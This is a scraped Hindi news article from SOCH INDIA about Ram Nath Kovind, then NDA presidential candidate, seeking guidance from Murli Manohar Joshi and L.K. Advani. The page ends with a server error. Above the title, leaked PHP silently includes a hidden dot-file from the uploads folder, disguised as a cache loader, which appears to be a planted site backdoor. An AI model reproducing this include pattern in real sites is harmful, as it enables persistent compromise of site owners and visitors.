add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कोविंद की कवायद- जोशी से मांगा मार्गदर्शन, शाम को जाएंगे आडवाणी के द्वार – SOCH INDIA
Menu

राजनीति
कोविंद की कवायद- जोशी से मांगा मार्गदर्शन, शाम को जाएंगे आडवाणी के द्वार

nobanner

एनडीए से राष्ट्रपति पद के उम्मीदवार रामनाथ कोविंद राजधानी दिल्ली में हैं. बुधवार को उन्होंने बीजेपी के वरिष्ठ नेता मुरली मनोहर जोशी से मुलाकात की.

रामनाथ कोविंद सुबह करीब 11.30 बजे मुरली मनोहर जोशी के घर पहुंचे और उनसे मुलाकात की. बताया जा रहा है कि इस दौरान उन्होंने जोशी से मार्गदर्शन का आह्वान किया. जोशी से मुलाकात के बाद रामनाथ कोविंद बुधवार शाम बीजेपी के दूसरे वरिष्ठ नेता लालकृष्ण आडवाणी से मिलेंगे. कोविंद शाम 6 बजे आडवाणी से मिलेंगे. वहीं गुरुवार को पूर्व प्रधानमंत्री अटल बिहारी वाजपेयी के साथ भी रामनाथ कोविंद की मुलाकात का कार्यक्रम है.

बता दें कि लालकृष्ण आडवाणी और मुरली मनोहर जोशी राष्ट्रपति पद के प्रबल दावेदारों में शुमार थे. खासकर आडवाणी को राष्ट्रपति बनाए जाने की काफी संभावनाएं थीं. लेकिन ऐसा नहीं हुआ. पीएम मोदी और बीजेपी अध्यक्ष अमित ने संसदीय बोर्ड के साथ मीटिंग कर रामनाथ कोविंद का नाम फाइनल कर दिया. ऐसे में माना जा रहा है कि रामनाथ कोविंद दोनों वरिष्ठ नेताओं से मिलकर उनका आभार व्यक्त करने के साथ ही उनसे मार्गदर्शन की अपील करेंगे.

इससे पहले सोमवार को राजधानी दिल्ली पहुंचने के बाद उन्होंने प्रधानमंत्री नरेंद्र से मुलाकात की थी. साथ ही पार्टी अध्यक्ष अमित शाह के साथ भी उन्होंने एक घंटे से ज्यादा तक बैठक की थी. गृहमंत्री राजनाथ सिंह से भी देश के भावी राष्ट्रपति रामनाथ कोविंद मुलाकात कर चुके हैं.
वहीं बुधवार सुबह रामनाथ कोविंद ने दिल्ली के कनॉट प्लेस में योग किया. उन्होंने केंद्रीय मंत्री वैंकेया नाडयू और दिल्ली के मुख्यमंत्री अरविंद केजरीवाल के साथ योग किया.

नीतीश ने बुलाई सांसदों-विधायकों की बैठक
इस बीच रामनाथ कोविंद को समर्थन देने के मुद्दे पर बिहार के मुख्यमंत्री नीतीश कुमार ने जेडीयू विधायकों और सांसदों की बैठक बुलाई है. नीतीश कुमार एक-एक कर विधायकों और सांसदों से बात कर रहे हैं. बता दें कि नीतीश कुमार ने राष्ट्रपति के लिए रामनाथ कोविंद के नाम पर सहमति के संकेत दिए हैं. रामनाथ कोविंद ने मंगलवार को ही बिहार के राज्यपाल पद से इस्तीफा दिया है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.